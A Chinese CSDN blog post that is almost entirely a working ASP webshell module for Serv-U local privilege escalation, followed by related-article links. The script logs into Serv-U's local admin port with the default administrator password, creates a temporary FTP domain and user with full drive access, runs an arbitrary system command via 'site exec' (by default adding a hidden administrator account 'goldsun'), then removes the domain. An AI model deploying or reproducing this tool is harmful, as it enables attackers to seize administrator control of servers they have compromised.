serv-u 源代码 自己找到的

最新推荐文章于 2024-05-06 19:00:00 发布
最新推荐文章于 2024-05-06 19:00:00 发布
阅读量429 收藏
点赞数
文章标签: action input session user cmd javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wakakaxi/article/details/4564149
版权

<%
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if  not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
   f=left(f,2)
end if
ftpport = 21
timeout=3

loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|61.156.217.38|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=61.156.217.38" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
        "-HomeDir=c://" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c://|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case action
case 1
    set a=Server.CreateObject("Microsoft.XMLHTTP")
    a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
    a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
    set session("a")=a
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%>...<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 2
    set b=Server.CreateObject("Microsoft.XMLHTTP")
    b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
    b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
   set session("b")=b
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>正在提升权限,请等待...,<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 3
    set c=Server.CreateObject("Microsoft.XMLHTTP")
    c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
    c.send loginuser & loginpass & mt & deldomain & quit
    set session("c")=c
%>
<center>提权完毕,已执行了命令:<br><font color=red><%=cmd%></font><br><br>
<input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';">
</center>

<%
case else
on error resume next
    set a=session("a")
    set b=session("b")
    set c=session("c")
    a.abort
    Set a = Nothing
    b.abort
    Set b = Nothing
    c.abort
    Set c = Nothing
%>
<center><form method="post" name="goldsun">
<table width="494" height="163" border="1" cellpadding="0" cellspacing="1" bordercolor="#666666">
  <tr align="center" valign="middle">
    <td colspan="2">Serv-U TTk</td>
  </tr>
  <tr align="center" valign="middle">
    <td width="100">用户名:</td>
    <td width="379"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>口 令:</td>
    <td><input name="p" type="text" id="p" value="#l@$ak#.lk;0@P"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>端 口:</td>
    <td><input name="port" type="text" id="port" value="43958"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>系统路径:</td>
    <td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>命 令:</td>
    <td><input name="c" type="text" id="c" value="cmd /c net user goldsun love /add & net localgroup administrators goldsun /add" size="50"></td>
  </tr>
 
  <tr align="center" valign="middle">
    <td colspan="2"><input type="submit" name="Submit" value="提交"> 
      <input type="reset" name="Submit2" value="重置">
      <input name="action" type="hidden" id="action" value="1"></td>
  </tr>
</table></form></center>
<% end select
function Gpath()
on error resume next
    err.clear
    set f=Server.CreateObject("Scripting.FileSystemObject")
    if err.number>0 then
 gpath="c:"
        exit function
    end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>

wakakaxi
关注
serv u使用mysql数据库_Serv-U如何连接mysql
weixin_30783611的博客
01-19 358
展开全部利用serv-u连接mysql或者是连接access数据库的程序用来实62616964757a686964616fe59b9ee7ad9431333337623438现防盗连的技术!网上有很多地方转载了该文章,对于access的技术是很简单实现了,也可以连接mssql等,都可以实现,mysql也可以实现,不过,有些文章说的不太精确,有少许的欠缺,所以补充一下!Serv-U5/6下经过测试均...
Serv-U在线WEB管理系统
07-03
Serv-U在线WEB管理系统,Serv-U在线WEB管理系统Serv-U在线WEB管理系统
serv-u使用完整版(含教程及源码)
10-31
Serv-U FTP Server V6.4.0.6汉化绿色破解版.RAR serv-u建表语句.txt serv-u ODBC设置 及 MSSQL数据库设置.png 用程序来自动建立FTP帐号.png Ftp在线注册管理系统源码[Serv-U].rar
Serv-U-精简版_serv-u_
10-03
可以做FPT服务器用来上传和下载文件,包括大文件,小文件,压缩文件,打包软件,安装包,联合包,开发包,网包,是个包,垃圾包。
一个结合Serv-U+C#实现的Ftp在线注册管理系统源码
11-18
一个结合Serv-U+C#实现的Ftp在线注册管理系统源码.
用delphi开发Serv-U插件
surpaimb的专栏
12-27 2042
花了一下午,邊看說明 邊學著寫Serv-U的插件,本來都快完成了,誰知道因為INI裡的設定寫錯了,老是有個地方通不過,只好Serv-U的主頁去找例子,一找就找到了一個Delphi 4寫的例子,因為是99年的,所以我根據說明 把新增的常量加上去,這下就比較完美了 我就簡單的介紹一下Serv-U的插件機制吧: Serv-U的說明 裡在Extending Serv-U中詳細地介紹了插件,用途主要有 可以
serv u使用mysql数据库_使用ODBC数据库管理Serv-U的FTP用户及相关ASP编程[附源码示例下载]...
weixin_39712016的博客
02-22 198
使用ODBC数据库管理Serv-U的FTP用户及相关ASP编程[附源码示例下载]Serv-U是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等,功能非常完备。它具有非常完备的安全特性,支持SSlFTP传输,支持在多个Serv-U和FTP客户端通过SSL加密连接保护您的数据安全等。Se...
记一次Serv-U提权
kendyhj9999的专栏
03-09 9717
记一次Serv-U提权 记一次Serv-U提权 http://hi.baidu.com/sdghgk/item/37b433ce7bce197489ad9e82 作者:白开 文章来源:http://hi.baidu.com/sdghgk Serv-U提权可谓是老生常谈了,由于Serv-U的用户多,提权成功率也高,众多ASP木马纷纷将此提权功能集成在内。然而通过这次提权我发
网络安全漏洞深度剖析
最新发布
qingkahui24689的博客
05-06 947
2021年7月13日,美国微软威胁情报中心发布安全公告[1],文中指出黑客利用Serv-U 0day对极少数美国军工部门成功进行了攻击,同日Serv-U母公司solarwinds也发布安全公告[2],并针对最新大版本发布了补丁[3]。(注意:目前发布的补丁只针对最新的15.2.3大版本,且只能是付费用户才能下载安装补丁,非付费用户目前无法从官方渠道获取有效补丁。根据补丁比较和fuzzer,宁静之盾安全团队成功复现了该远程溢出漏洞,并能在实战环境下成功利用。
serv-u 系统服务看门狗,自动脱机补丁,自动启动
weixin_34007886的博客
08-08 124
  今天在给朋友的VPS配置SERV-U的时候,将系统服务的默认启动账号换成了自建账号,导致FTP服务频繁自动脱机;差不多每个10分钟左右就会脱机一次,然后只能手动启动它;       将服务的账号换为自建账号是为了服务器安全,但是换了后服务就自动停止了;不可能每次都人工手动去启动,于是我决定给这个服务增加一个看门狗服务; 看门狗服务每个5秒检测一次serv-u服务的状态,如果停止就立即启动;...
使用ODBC数据库管理Serv-U的FTP用户及相关ASP编程[附源码示例下载]
10-30
5. 重新打开Serv-U找到刚才你新建的域,在ODBC设置中应该已经能够看到ODBC链接设置中,除了ODBC源名称、帐号和密码部分空的外,其他的表名和列名都已经设置好了。 使用ODBC数据库管理Serv-U的FTP用户及相关ASP...
Serv-U6.1.0.5
06-15
Serv-U6.1.0.5】是文件服务器管理软件Serv-U的一个特定版本,它主要用于FTP(File Transfer Protocol)服务的管理和配置。这个版本在发布时强调了其安全性,指出它还没有已知的权限提升漏洞,这表示用户可以安心...
Serv-U 用户在线注册管理程序(odbc+asp版)
04-01
 本程序采用ms Access+ASP设计,以Serv-U原版软件为基础,无需购买任何插件,可让Serv-U具有用户在线实时注册、管理的功能。设置简单,适用范围广,可广泛地应用于空间提供商,论坛,学校机房,单位内部网等用Serv-...
Serv-U日志分析工具(sustat)(含使用说明)
04-18
Serv-U日志文件通常以纯文本格式保存,包含了每次FTP会话的详细信息,如连接时间、用户名、源IP地址、执行的操作(如上传、下载、列出目录等)、传输的文件名及大小、会话状态(成功或失败)等。这些数据对于跟踪...
sustat2.0(SERV-U日志分析工具)
04-10
5. **contribution.txt**:很可能包含关于开发者贡献、源代码贡献或其他社区贡献的信息,对于开源项目而言,这通常是一个重要文件,用于感谢和支持贡献者。 通过SUSTAT,我们可以分析以下关键指标: - **连接次数*...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值